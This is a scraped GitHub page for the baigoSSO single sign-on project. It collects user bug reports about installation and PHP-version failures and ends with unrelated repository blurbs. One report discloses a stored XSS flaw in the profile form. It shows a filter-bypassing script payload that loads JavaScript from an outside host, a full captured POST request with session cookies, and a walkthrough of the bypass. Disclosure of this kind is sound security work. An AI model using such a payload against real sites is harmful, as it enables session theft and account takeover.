baigostudio / baigosso Goto Github PK
View Code? Open in Web Editor NEW单点登录系统
Home Page: http://www.baigo.net/sso/
License: Apache License 2.0
单点登录系统
Home Page: http://www.baigo.net/sso/
License: Apache License 2.0
config 目录 config.inc.sample.php, runtime.php 都没有,运行安装提示错误。
为了安装SSO。我花了一上午时间,最后发现,竟然不支持PHP7.1,我想问一下,啥时候可以支持PHP7.1啊。
//define('BG_URL_ROOT', str_ireplace(DS, '/', str_ireplace($_SERVER['DOCUMENT_ROOT'], '', BG_PATH_ROOT))); 这个在win下报错
define('BG_URL_ROOT', '/');
支持标准的SSO协议吗? CAS, SAML, OAUTH2,OIDC?
解压放到根目录,访问http://xxx.com/install/
数据库名错误!
您设置的数据库名错误,可能是数据库名错误或者是设置的用户名没有该数据库的权限,详情请咨询数据库服务器提供商。在得到正确的数据库信息后,请重新安装本系统。
如需重新安装,请执行如下步骤:
删除 ./config/is_install.php 文件
重新运行 ./install/ctl.php
环境 PHP5.5.25 + Nginx + Mysql 5.5
下载安装好了程序,环境为CENTOS7.2,LAMP,环境安装没问题,数据库连接,PHP都完全正常,但是在baigo_sso的数据库连接验证那里一直过不去,错误:数据库未正确设置 x030404,实现不知道哪里还有问题了~~~~
$path = strtolower($path);
安装到数据库时,无法创建表
什么时候可以支持php7
Fatal error: Cannot unset $this in /ginkgo/core/captcha.class.php on line 256
在Windows环境下安装正常,在Linux下(宝塔面板)始终令牌错误和验证码错误
最后找到了解决办法,看了一遍源码发现他的Session是存在文件里面的,而且还是runtime
目前发现他不会自己创建runtime,所以手动创建一个就好了
你好, user_contact 等多个字段设置了NOT NULL,会导致在安装的时候 “创建管理员” 步骤会失败
https://github.com/baigoStudio/baigoSSO/blob/master/core/model/user.class.php#L40
提交数据库信息提示
A xss vulnerability was discovered in baigoCMS.
There is a persistent XSS attacks vulnerability which allows remote attackers to inject arbitrary web script or HTML via the form(admin_nick) parameter post to the
/public/console/profile/info-submit/
xss payload:<sCRiPt/SrC=//your js>
POST /public/console/profile/info-submit/?1570709270213at0.7949324520660688 HTTP/1.1
Host: ad.com
Proxy-Connection: keep-alive
Content-Length: 116
Pragma: no-cache
Cache-Control: no-cache
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://ad.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://ad.com/public/console/profile/info/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: baigo_sso_admin_id=1; baigo_sso_admin_hash=62bcd73f59081180cdda5bdf87d86b40; baigo_sso_admin_login_type=form; baigo_sso_admin_cookie_time=1570709261; PHPSESSID=268dc2000398555211fc455bbc0ded26; BX=8k8fbjteptoil&b=3&s=5v; baigoSSOssinID=0de8f68574d90c91896a1ee2a2f1dcaa
__token__=417102b0cdb072c660d1dca097b83ac1&admin_pass=123123&admin_nick=%3CsCRiPt%2FSrC%3D%2F%2F%C3%A7.top%2FImLm%3E
Submit this form, after refreshing, you can find that our xss statement was successfully executed.
Filename:app/ctrl/console/profile.ctrl.php function:infoSubmit Line 70 ,It filters the content on the input.
Continue to follow up on this process
Because the incoming argument is an array, it will go into the fillParam method of line 352.
In the 826 line, enter the safe function to filter the input content.
Filtering the input content by xss and sql injection.But we can bypass this.
payload:
<sCRiPt/SrC=//js>
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.